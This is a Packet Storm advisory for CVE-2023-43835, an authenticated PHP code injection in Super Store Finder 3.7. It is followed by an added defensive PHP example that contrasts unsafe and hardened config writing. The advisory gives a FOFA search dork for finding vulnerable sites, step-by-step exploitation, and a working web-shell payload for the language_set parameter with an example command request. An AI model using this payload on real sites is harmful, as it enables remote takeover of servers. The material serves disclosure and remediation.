CVE-2023-43835: Super Store Finder 3.7 Remote Command Execution ≈ Packet Storm
Super Store Finder versions 3.7 and below are vulnerable to authenticated arbitrary PHP code injection, which can lead to remote code execution when saved settings overwrite the content of config.inc.php.
# Vulnerability : Authenticated Arbitrary PHP Code Injection leading to Remote Code Execution
# Researcher : Etharus
# Vendor : Joe Iz, https://www.superstorefinder.net/
# Demo Url : https://superstorefinder.net/products/superstorefinder/
# Version Affected : 3.7 and below
# Date : 18 September 2023
# FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Log in as user/admin
# Step 2 : Go to Settings at the top right
# Step 3 : Turn on a proxy to intercept the request and save the settings
# Step 4 : In the language_set parameter, set the value to en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//
# Step 5 : Because index.php calls config.inc.php, RCE is reachable with the parameter ?cmd=
# Step 6 : Example: http://localhost/?cmd=uname%20-a
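
The root cause described above is a request value being written into PHP source that is later included. As an added example (not Super Store Finder code and not the researcher's), the PHP below contrasts an unsafe config writer with a hardened one and checks the generated source for extra statements. The `LANGUAGE_SET` constant, the config line format and the function names are assumptions, and the hostile sample value is constructed.

```php
<?php
// Added illustration; not Super Store Finder source. The config line format,
// the LANGUAGE_SET constant and the function names below are assumptions.

// Vulnerable pattern: the request value is pasted into PHP source text, so a
// quote in the value ends the string literal and the rest is parsed as code.
function render_config_unsafe(string $lang): string
{
    return "<?php\ndefine('LANGUAGE_SET', '" . $lang . "');\n";
}

// Hardened pattern: allow-list the value, then let var_export() produce the
// literal so quoting is never done by hand.
function render_config_safe(string $lang): string
{
    // Accept only locale codes such as en_US; reject everything else.
    if (preg_match('/\A[a-z]{2}_[A-Z]{2}\z/', $lang) !== 1) {
        throw new InvalidArgumentException('language_set is not a valid locale code');
    }
    return "<?php\ndefine('LANGUAGE_SET', " . var_export($lang, true) . ");\n";
}

// Count statement terminators in generated source. A config with one setting
// should contain exactly one; more means a value escaped its string literal.
function statement_count(string $source): int
{
    $count = 0;
    foreach (token_get_all($source) as $token) {
        if ($token === ';') {
            $count++;
        }
    }
    return $count;
}

// Constructed input: a value containing a quote and a trailing statement.
$hostile = "en_US'); echo 'injected'; //";

echo statement_count(render_config_unsafe('en_US')), "\n";   // benign value
echo statement_count(render_config_unsafe($hostile)), "\n";  // hostile value
try {
    render_config_safe($hostile);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
// Without the allow-list, var_export() alone still emits a single literal.
echo statement_count("<?php\ndefine('LANGUAGE_SET', " . var_export($hostile, true) . ");\n"), "\n";
```

The same tokenizer check can be run against an existing config.inc.php during incident triage to spot settings lines that carry more statements than expected.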